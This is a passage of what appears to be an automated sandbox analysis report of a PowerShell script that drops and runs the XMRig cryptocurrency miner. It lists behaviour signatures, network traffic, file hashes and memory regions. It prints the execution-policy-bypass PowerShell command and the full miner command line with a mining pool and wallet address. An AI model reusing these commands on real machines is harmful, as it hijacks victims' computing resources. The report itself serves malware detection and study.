| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.65.42.20.in-addr.arpa | udp |
Files
memory/4428-0-0x00007FFE0DD13000-0x00007FFE0DD15000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4utxyqzr.skj.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4428-6-0x000001F2A02C0000-0x000001F2A02E2000-memory.dmp
memory/4428-11-0x00007FFE0DD10000-0x00007FFE0E7D1000-memory.dmp
memory/4428-12-0x00007FFE0DD10000-0x00007FFE0E7D1000-memory.dmp
memory/4428-14-0x00007FFE0DD10000-0x00007FFE0E7D1000-memory.dmp
memory/4428-15-0x000001F2B9080000-0x000001F2B9092000-memory.dmp
memory/4428-16-0x000001F2B87C0000-0x000001F2B87CA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4628-47-0x000001FEC62F0000-0x000001FEC6310000-memory.dmp
memory/4628-48-0x000001FEC6340000-0x000001FEC6360000-memory.dmp
memory/4628-49-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-51-0x000001FEC7C30000-0x000001FEC7C50000-memory.dmp
memory/4628-52-0x000001FEC7C10000-0x000001FEC7C30000-memory.dmp
memory/4428-50-0x00007FFE0DD13000-0x00007FFE0DD15000-memory.dmp
memory/4428-54-0x00007FFE0DD10000-0x00007FFE0E7D1000-memory.dmp
memory/4628-53-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-55-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4428-56-0x00007FFE0DD10000-0x00007FFE0E7D1000-memory.dmp
memory/4628-57-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-58-0x000001FEC7C30000-0x000001FEC7C50000-memory.dmp
memory/4628-59-0x000001FEC7C10000-0x000001FEC7C30000-memory.dmp
memory/4628-60-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-61-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-62-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-63-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-64-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-65-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-66-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-67-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-68-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-69-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-70-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-71-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-72-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-73-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-74-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-75-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-76-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-77-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-78-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-79-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-80-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-81-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-82-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-83-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-84-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-85-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-86-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-87-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-88-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-89-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-90-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-91-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-92-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-93-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-94-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-95-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-96-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-97-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-98-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-99-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-100-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-101-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-102-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-103-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-104-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-105-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-106-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-107-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-108-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-109-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-110-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-111-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-112-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-113-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-114-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-115-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-116-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-117-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-118-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:24
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1776s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3044 wrote to memory of 1692 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3044 wrote to memory of 1692 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.19.74.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.179.89.13.in-addr.arpa | udp |
Files
memory/3044-0-0x00007FFEE9C43000-0x00007FFEE9C45000-memory.dmp
memory/3044-1-0x000001C76D800000-0x000001C76D822000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d3j0y50v.dj4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3044-11-0x00007FFEE9C40000-0x00007FFEEA701000-memory.dmp
memory/3044-12-0x00007FFEE9C40000-0x00007FFEEA701000-memory.dmp
memory/3044-14-0x00007FFEE9C40000-0x00007FFEEA701000-memory.dmp
memory/3044-15-0x000001C76DAB0000-0x000001C76DAC2000-memory.dmp
memory/3044-16-0x000001C76D7E0000-0x000001C76D7EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1692-47-0x00000284ECC40000-0x00000284ECC60000-memory.dmp
memory/1692-48-0x00000284ECC90000-0x00000284ECCB0000-memory.dmp
memory/1692-49-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/3044-50-0x00007FFEE9C40000-0x00007FFEEA701000-memory.dmp
memory/3044-52-0x00007FFEE9C43000-0x00007FFEE9C45000-memory.dmp
memory/1692-51-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-54-0x00000284EE570000-0x00000284EE590000-memory.dmp
memory/1692-55-0x00000284EE590000-0x00000284EE5B0000-memory.dmp
memory/3044-53-0x00007FFEE9C40000-0x00007FFEEA701000-memory.dmp
memory/1692-56-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/3044-57-0x00007FFEE9C40000-0x00007FFEEA701000-memory.dmp
memory/1692-58-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-60-0x00000284EE590000-0x00000284EE5B0000-memory.dmp
memory/1692-59-0x00000284EE570000-0x00000284EE590000-memory.dmp
memory/1692-61-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-62-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-63-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-64-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-65-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-66-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-67-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-68-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-69-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-70-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-71-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-72-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-73-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-74-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-75-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-76-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-77-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-78-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-79-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-80-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-81-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-82-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-83-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-84-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-85-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-86-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-87-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-88-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-89-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-90-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-91-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-92-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-93-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-94-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-95-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-96-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-97-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-98-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-99-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-100-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-101-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-102-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-103-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-104-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-105-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-106-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-107-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-108-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-109-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-110-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-111-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-112-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-113-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-114-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-115-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-116-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-117-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-118-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-119-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:28
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1750s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1448 wrote to memory of 4344 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1448 wrote to memory of 4344 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 138.91.171.81:80 | tcp | |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
Files
memory/1448-4-0x00007FF97EED3000-0x00007FF97EED4000-memory.dmp
memory/1448-5-0x000001A26F3D0000-0x000001A26F3F2000-memory.dmp
memory/1448-8-0x00007FF97EED0000-0x00007FF97F8BC000-memory.dmp
memory/1448-9-0x00007FF97EED0000-0x00007FF97F8BC000-memory.dmp
memory/1448-10-0x000001A26F580000-0x000001A26F5F6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sxroxigf.kgg.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1448-25-0x00007FF97EED0000-0x00007FF97F8BC000-memory.dmp
memory/1448-48-0x000001A26F500000-0x000001A26F512000-memory.dmp
memory/1448-61-0x000001A26F1E0000-0x000001A26F1EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
